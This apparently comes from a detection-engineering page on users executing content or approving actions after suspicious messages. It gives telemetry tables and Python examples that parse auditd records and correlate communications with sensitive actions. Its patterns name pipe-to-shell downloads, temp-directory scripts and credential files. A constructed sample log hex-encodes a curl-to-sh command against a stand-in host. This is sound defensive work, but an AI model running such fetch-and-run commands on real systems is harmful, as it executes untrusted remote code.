Detects users executing commands copied from chats, tickets, or emails, including curl|bash patterns, shell script launches from temp directories, credential changes, or SSH key additions shortly after communication events.

| Data Component | Name | Channel |
|---|---|---|
| Network Connection Creation (DC0082) | NSM:Connections | Outbound connection after script or installer launch |
| Command Execution (DC0064) | auditd:EXECVE | execve of curl, wget, bash, sh, python with piped or remote content |
| File Modification (DC0061) | auditd:PATH | Modification of ~/.ssh/authorized_keys or credential files |

| Field | Description |
|---|---|
| RemoteScriptExecutionPatterns | Organization-specific admin automation patterns to exclude |
| TicketToExecutionWindow | Time from help desk/chat event to command execution |

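
The record parsing and pattern classification behind this Linux analytic, as an added example that is not part of the original page: it decodes auditd's hex-encoded EXECVE arguments, joins SYSCALL, EXECVE and PATH records that share one audit serial, and classifies each group against the curl|bash, temp-directory script, credential-tool and authorized_keys patterns while honouring a RemoteScriptExecutionPatterns exclusion. The sample records, the deploy.corp.example allowlist entry and the `cred_files` audit key (assumed to come from a watch rule such as `-w /home -p wa -k cred_files`) are constructed assumptions; the TicketToExecutionWindow correlation is left to the communication-to-action correlator shown later on this page.

```python
"""Classify auditd record groups for the curl|bash, temp-directory script,
credential-change and authorized_keys patterns in the Linux analytic above.
Added example: sample records, the allowlist entry and the `cred_files` key
are constructed (the key assumes a watch rule like `-w /home -p wa -k cred_files`)."""
import re
from collections import defaultdict
from os.path import basename

# Tunable RemoteScriptExecutionPatterns: approved remote-script sources (constructed)
REMOTE_SCRIPT_EXECUTION_PATTERNS = [re.compile(r"https://deploy\.corp\.example/")]

# `curl ... | sh`, `wget -qO- ... | sudo bash`, and similar pipe-to-shell forms
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+(-\S+\s+)*)?(ba|z|da)?sh\b")
SHELLS = {"sh", "bash", "zsh", "dash"}
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
CREDENTIAL_TOOLS = {"passwd", "chpasswd", "usermod", "ssh-copy-id"}
CREDENTIAL_FILES = ("/.ssh/authorized_keys", "/etc/shadow", "/etc/sudoers")
CRED_WATCH_KEY = "cred_files"   # assumed audit key of the file-modification watch rule

TYPE_RE = re.compile(r"^type=(\w+) msg=audit\((\d+\.\d+):(\d+)\)")
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')   # aN="x" or aN=<hex>
NAME_RE = re.compile(r'\bname="([^"]*)"')
FIELD_RE = re.compile(r'\b(auid|key)=("?)([^\s"]*)\2')

# Constructed sample: serial 201 pipes a download into sh (a2 is hex-encoded, as
# auditd does for arguments containing spaces), 202 runs a script from /tmp,
# 203 writes authorized_keys under the watch key, 204 is allowlisted automation
# (left quoted rather than hex-encoded for readability; the parser accepts both).
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1700000100.101:201): arch=c000003e syscall=59 success=yes exit=0 auid=1000 uid=1000 comm="bash" exe="/usr/bin/bash" key="exec"
type=EXECVE msg=audit(1700000100.101:201): argc=3 a0="bash" a1="-c" a2=6375726C202D7320687474703A2F2F782E746573742F612E7368207C207368
type=SYSCALL msg=audit(1700000130.555:202): arch=c000003e syscall=59 success=yes exit=0 auid=1000 uid=1000 comm="bash" exe="/usr/bin/bash" key="exec"
type=EXECVE msg=audit(1700000130.555:202): argc=2 a0="bash" a1="/tmp/update.sh"
type=SYSCALL msg=audit(1700000140.010:203): arch=c000003e syscall=257 success=yes exit=3 auid=1000 uid=1000 comm="tee" exe="/usr/bin/tee" key="cred_files"
type=PATH msg=audit(1700000140.010:203): item=1 name="/home/alice/.ssh/authorized_keys" inode=1234 nametype=NORMAL
type=SYSCALL msg=audit(1700000200.000:204): arch=c000003e syscall=59 success=yes exit=0 auid=1000 uid=1000 comm="bash" exe="/usr/bin/bash" key="exec"
type=EXECVE msg=audit(1700000200.000:204): argc=3 a0="bash" a1="-c" a2="curl -fsSL https://deploy.corp.example/agent.sh | bash"
"""


def decode_argv(execve_line):
    """Rebuild argv from an EXECVE record, decoding hex-encoded arguments."""
    args = {}
    for idx, quoted, hexed in ARG_RE.findall(execve_line):
        args[int(idx)] = bytes.fromhex(hexed).decode("utf-8", "replace") if hexed else quoted
    return [args[i] for i in sorted(args)]


def group_records(lines):
    """Join SYSCALL, EXECVE and PATH records that share one audit serial."""
    groups = defaultdict(lambda: {"ts": 0.0, "argv": [], "paths": [], "auid": None, "key": None})
    for line in lines:
        m = TYPE_RE.match(line.strip())
        if not m:
            continue
        rtype, ts, serial = m.group(1), float(m.group(2)), m.group(3)
        g = groups[serial]
        g["ts"] = ts
        if rtype == "EXECVE":
            g["argv"] = decode_argv(line)
        elif rtype == "PATH":
            g["paths"].extend(NAME_RE.findall(line))
        elif rtype == "SYSCALL":
            for name, _, value in FIELD_RE.findall(line):
                g[name] = value
    return dict(groups)


def classify(group):
    """Return the names of the analytic's patterns that a record group matches."""
    argv, findings = group["argv"], []
    cmdline = " ".join(argv)
    if argv and any(p.search(cmdline) for p in REMOTE_SCRIPT_EXECUTION_PATTERNS):
        return []                                   # approved admin automation
    exe = basename(argv[0]) if argv else ""
    if PIPE_TO_SHELL.search(cmdline):
        findings.append("pipe_to_shell")
    if argv and (argv[0].startswith(TEMP_DIRS) or
                 (exe in SHELLS and any(a.startswith(TEMP_DIRS) for a in argv[1:]))):
        findings.append("script_from_temp_dir")
    if exe in CREDENTIAL_TOOLS:
        findings.append("credential_change")
    if group["key"] == CRED_WATCH_KEY and any(p.endswith(CREDENTIAL_FILES) for p in group["paths"]):
        findings.append("credential_file_modified")
    return findings


def scan(log_text):
    """Return (serial, auid, findings) for every matching record group, oldest first."""
    hits = []
    for serial, g in sorted(group_records(log_text.splitlines()).items(), key=lambda kv: kv[1]["ts"]):
        findings = classify(g)
        if findings:
            hits.append((serial, g["auid"], findings))
    return hits


if __name__ == "__main__":
    for serial, auid, findings in scan(SAMPLE_AUDIT_LOG):
        print(serial, auid, findings)
```

The `auid` field is carried through because it identifies the logged-in user even under `sudo`, which is the identity a TicketToExecutionWindow join against help-desk or chat events needs; the `key` check prevents an `authorized_keys` read from being reported as a modification.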
Detects user execution of newly received content or instructions shortly after external communication, including script launches, Office child process spawning, browser-to-script execution chains, or credential prompts followed by new logon sessions.

| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3, 22 |
| Logon Session Creation (DC0067) | WinEventLog:Security | EventCode=4624, 4648 |
| File Creation (DC0039) | WinEventLog:Sysmon | EventCode=11 |

| Field | Description |
|---|---|
| EmailToExecutionWindow | Time between message delivery and process launch |
| OfficeChildProcessAllowlist | Approved Office child process patterns |
| NewLogonWindow | Time after credential prompt to monitor new sessions |

Detects consent grants, password resets, role changes, external sharing, or token creation shortly after user interaction with messages, invites, or help desk workflows. Emphasis is placed on unusual requester relationships, new device context, or off-hours approvals.

| Data Component | Name | Channel |
|---|---|---|
| User Account Authentication (DC0002) | saas:okta | user.account.reset_password; user.mfa.factor.activate; app.oauth2.authorize |
| Application Log Content (DC0038) | saas:slack | External DM or workspace invite preceding credential or approval actions |
| Application Log Content (DC0038) | saas:zoom | Unexpected contact interaction preceding follow-on admin requests |

| Field | Description |
|---|---|
| RequesterNoveltyDays | How long since requestor last interacted with user |
| GeoVelocityThreshold | Distance/time anomaly for follow-on login |
| AfterHoursDefinition | Organization-specific off-hours period |

Detects suspicious inbound communications or collaboration requests followed by rapid sensitive user actions such as file sharing changes, macro enablement, OAuth consent, credential submission, or financial workflow approvals that deviate from historical relationships or normal approval patterns.

| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | m365:unified | MailItemsAccessed; AddedInboxRule; ConsentToApplication; SharingSet |
| Application Log Content (DC0038) | m365:exchange | External sender message followed by user action involving links or attachments |
| Application Log Content (DC0038) | m365:teams | External chat request or new tenant communication preceding approval activity |

| Field | Description |
|---|---|
| ActionAfterMessageWindow | Time window between inbound communication and sensitive action |
| TrustedDomainAllowlist | Known legitimate vendors or partner domains |
| ApprovalAmountThreshold | Monetary threshold for finance workflows |

Detects user-authorized execution of downloaded content or scripts after communication prompts, including browser downloads followed by osascript, shell, or installer execution and subsequent network activity.

| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | macos:unifiedlog | Execution of osascript, sh, bash, zsh, installer, open |
| Network Connection Creation (DC0082) | NSM:Connections | Outbound connection after script or installer launch |
| File Access (DC0055) | macos:unifiedlog | Recent download opened or executed |

| Field | Description |
|---|---|
| DownloadToExecutionWindow | Time between download and launch |
| InstallerParentAllowlist | Legitimate software deployment parents |
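
The Windows, SaaS, M365 and macOS analytics above share one shape: an inbound communication, then a sensitive action by the same user inside a tunable window, weighted by how well the requester is known and whether the action happened off hours. The correlator below is an added example, not code from the original page: it normalises events from the channels named in the tables into one record type, applies ActionAfterMessageWindow, TrustedDomainAllowlist, RequesterNoveltyDays and AfterHoursDefinition, and emits scored alerts. Every event, domain, user name and tunable value in it is constructed; the Windows analytic's process-creation and logon-session actions plug into the same SENSITIVE_ACTIONS table.

```python
"""Correlate inbound communication events with sensitive follow-on actions inside
a tunable window, scoring requester novelty and off-hours timing. Added example
for the Windows, SaaS, M365 and macOS analytics above; all events, domains and
tunable values are constructed."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, time, timedelta


@dataclass
class Event:
    ts: datetime
    user: str
    kind: str         # "communication" or "action"
    source: str       # channel name as used in the tables above
    detail: str       # sender/requester for a communication, action name otherwise
    domain: str = ""  # sender/requester domain (communication events only)


@dataclass
class Tunables:
    action_after_message_window: timedelta = timedelta(minutes=30)  # ActionAfterMessageWindow
    trusted_domain_allowlist: frozenset = frozenset()               # TrustedDomainAllowlist
    requester_novelty_days: int = 30                                # RequesterNoveltyDays
    after_hours: tuple = (time(19, 0), time(7, 0))                  # AfterHoursDefinition (start, end)


# Actions the analytics treat as sensitive, keyed by channel
SENSITIVE_ACTIONS = {
    "m365:unified": {"ConsentToApplication", "SharingSet", "AddedInboxRule"},
    "saas:okta": {"user.account.reset_password", "user.mfa.factor.activate", "app.oauth2.authorize"},
    "WinEventLog:Security": {"4624", "4648"},
    "macos:unifiedlog": {"osascript", "sh", "bash", "zsh", "installer", "open"},
}

T = datetime(2024, 3, 4)  # constructed reference day
SAMPLE_EVENTS = [
    # alice: message from an allowlisted partner, then a sharing change -> suppressed
    Event(T.replace(hour=9), "alice", "communication", "m365:exchange", "ap@partner.example", "partner.example"),
    Event(T.replace(hour=9, minute=5), "alice", "action", "m365:unified", "SharingSet"),
    # carol: requester seen two days earlier, action four hours after the message -> outside window
    Event(T - timedelta(days=2), "carol", "communication", "m365:teams", "sam@vendor.example", "vendor.example"),
    Event(T.replace(hour=10), "carol", "communication", "m365:teams", "sam@vendor.example", "vendor.example"),
    Event(T.replace(hour=14), "carol", "action", "saas:okta", "app.oauth2.authorize"),
    # dave: known requester during the day, osascript launched 3 minutes later -> score 1
    Event(T - timedelta(days=1), "dave", "communication", "saas:zoom", "pm@client.example", "client.example"),
    Event(T.replace(hour=11), "dave", "communication", "saas:zoom", "pm@client.example", "client.example"),
    Event(T.replace(hour=11, minute=3), "dave", "action", "macos:unifiedlog", "osascript"),
    # bob: first-ever DM from an unknown workspace after hours, OAuth consent 12 minutes later -> score 3
    Event(T.replace(hour=21, minute=40), "bob", "communication", "saas:slack", "it-support@helpdesk-portal.example", "helpdesk-portal.example"),
    Event(T.replace(hour=21, minute=52), "bob", "action", "m365:unified", "ConsentToApplication"),
]


def is_after_hours(ts, window):
    start, end = window
    t = ts.time()
    if start > end:                      # off-hours period wraps past midnight
        return t >= start or t < end
    return start <= t < end


def correlate(events, tunables):
    """Return one scored alert per (untrusted message, sensitive action) pair inside the window."""
    recent = defaultdict(list)   # user -> [(message event, requester_is_novel)]
    last_seen = {}               # (user, domain) -> timestamp of the previous contact
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "communication":
            prev = last_seen.get((ev.user, ev.domain))
            novel = prev is None or ev.ts - prev > timedelta(days=tunables.requester_novelty_days)
            last_seen[(ev.user, ev.domain)] = ev.ts
            if ev.domain not in tunables.trusted_domain_allowlist:
                recent[ev.user].append((ev, novel))
            continue
        if ev.detail not in SENSITIVE_ACTIONS.get(ev.source, ()):
            continue
        cutoff = ev.ts - tunables.action_after_message_window
        recent[ev.user] = [(m, n) for m, n in recent[ev.user] if m.ts >= cutoff]  # drop stale messages
        after_hours = is_after_hours(ev.ts, tunables.after_hours)
        for msg, novel in recent[ev.user]:
            alerts.append({
                "user": ev.user, "trigger": msg.detail, "trigger_source": msg.source,
                "action": ev.detail, "action_source": ev.source,
                "delay_min": (ev.ts - msg.ts).total_seconds() / 60,
                "novel_requester": novel, "after_hours": after_hours,
                "score": 1 + int(novel) + int(after_hours),
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS, Tunables(trusted_domain_allowlist=frozenset({"partner.example"}))):
        print(alert)
```

Requester novelty is computed from the event stream itself, so the correlator needs the communication history to be replayed from at least RequesterNoveltyDays back before it is trusted; without that warm-up every requester looks new and scores are inflated. The window prune keeps per-user state bounded, which matters when the same logic runs over a high-volume logon or process-creation feed.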